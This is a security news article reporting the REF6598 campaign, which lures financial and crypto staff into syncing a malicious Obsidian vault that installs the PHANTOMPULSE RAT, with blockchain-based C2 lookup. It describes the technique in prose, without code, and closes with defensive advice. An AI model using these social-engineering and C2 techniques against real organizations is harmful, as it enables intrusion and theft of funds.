A newly documented cyber campaign, tracked as REF6598, is abusing the popular cross‑platform note‑taking application Obsidian to gain a foothold in financial and cryptocurrency organizations. According to Elastic Security Labs, the attackers use social engineering on LinkedIn and Telegram to lure victims into syncing a malicious Obsidian vault, which ultimately delivers a previously unknown Windows remote access trojan (RAT) dubbed PHANTOMPULSE.
Social engineering via LinkedIn and Telegram as the initial attack vector
The operation begins with a highly targeted social engineering approach. Threat actors contact employees of financial institutions, trading firms, or crypto projects on LinkedIn, posing as representatives of venture capital funds or investment companies. Once a rapport is established, the conversation is moved to a Telegram group chat that appears to include additional “partners” and “colleagues.”
In this chat, the attackers discuss liquidity, crypto products, and financial services, creating the impression of a legitimate business opportunity. This aligns with industry reporting such as the Verizon Data Breach Investigations Report, which consistently finds that the majority of breaches involve a human element, often through phishing, social engineering, or misuse of credentials.
Abuse of Obsidian community plugins instead of software vulnerabilities
A key aspect of REF6598 is that it does not rely on an Obsidian vulnerability. Instead, it misuses legitimate functionality. Victims are asked to join a shared Obsidian “workspace” or “dashboard” through an Obsidian cloud vault, for which the attackers provide credentials. After opening the vault, the user is instructed to enable synchronization of the Installed community plugins setting.
This manual step is critical: by default, syncing community plugins is disabled and cannot be turned on remotely. Once the victim activates it, Obsidian loads configuration files from the shared vault that specify which plugins to install and how to configure them.
The attackers abuse two legitimate community plugins: Shell Commands and Hider. Shell Commands executes system commands based on predefined triggers, while Hider conceals user-interface elements such as scrollbars and status bars, helping to mask malicious activity. The harmful logic resides in the vault’s JSON configuration, meaning there may be no obvious standalone malware file for traditional antivirus to detect.
PHANTOMPULSE RAT on Windows: Ethereum-based C2 discovery
On Windows systems, the Shell Commands plugin invokes a PowerShell script that downloads and runs an intermediate loader named PHANTOMPULL. This loader decrypts and deploys the core payload in memory: the PHANTOMPULSE remote access trojan, reportedly developed with the help of generative AI tools.
PHANTOMPULSE uses a non‑standard command‑and‑control (C2) mechanism. Instead of hard‑coding server domains, the malware queries the Ethereum blockchain, reading the most recent transaction associated with a wallet address embedded in its code. Data in that transaction points the malware to the current C2 endpoint. Because blockchain data is globally replicated and not easily taken down, this approach complicates traditional domain or IP blocklisting.
After retrieving the live C2 address, PHANTOMPULSE communicates via WinHTTP, exfiltrating system information and receiving instructions. Its capabilities are typical for a modern RAT: arbitrary command execution, file upload/download, screenshot capture, keylogging, and detailed system reconnaissance. In a financial or crypto context, such access can be used to move funds, steal trading strategies, or compromise back‑office systems.
macOS attack chain: AppleScript dropper and Telegram as a “dead drop”
For macOS targets, the attackers deploy a different toolset. Here, the Shell Commands plugin launches an obfuscated AppleScript‑based dropper. This script cycles through a list of hard‑coded domains to locate the current C2 server.
If these domains are unavailable, the malware falls back to Telegram as a “dead drop” channel, retrieving C2 information from messages or channels under the attackers’ control. This multi‑layer design makes the C2 infrastructure highly flexible and resistant to simple domain blocking.
Once it resolves a working C2 endpoint, the dropper downloads a second‑stage payload and executes it using the osascript command-line tool. Researchers were unable to obtain this final stage, as the C2 infrastructure was offline during analysis and the observed intrusion attempt was blocked before completion.
Security implications for financial and cryptocurrency organizations
REF6598 underscores a broader trend in modern cyber threats: abuse of trusted applications and extensibility features (plugins, macros, API integrations) is increasingly replacing classical exploits. When attackers rely on legitimate functionality, security controls focused solely on known vulnerabilities and static signatures lose effectiveness.
For financial and cryptocurrency organizations, it is advisable to review threat models and acceptable‑use policies around note‑taking and knowledge‑management tools. Concrete measures include:
• Controlling Obsidian and similar tools: restrict or monitor the use of community plugins, implement allowlists of approved extensions, and closely inspect shared vaults or workspaces originating from external parties.
• Monitoring high‑risk scripting engines: enable EDR/XDR rules to flag or block unusual execution of PowerShell, AppleScript, or other interpreters spawned by productivity apps like Obsidian, note tools, or messaging clients.
• Strengthening user awareness: train staff to verify the identity of supposed “investors” and “partners” on LinkedIn, be cautious when conversations move to encrypted messengers, and treat requests to log into external workspaces or sync unknown plugins as potential red flags.
Combining behavioral security technologies (EDR/XDR with process‑chain analysis, plugin management, and network monitoring) with continuous education on social engineering makes attacks like REF6598 significantly harder to execute. When employees are less willing to enable untrusted plugins or enter shared credentials into tools like Obsidian at the request of a new “investor,” even sophisticated, blockchain‑enabled malware such as PHANTOMPULSE has far fewer opportunities to gain initial access.
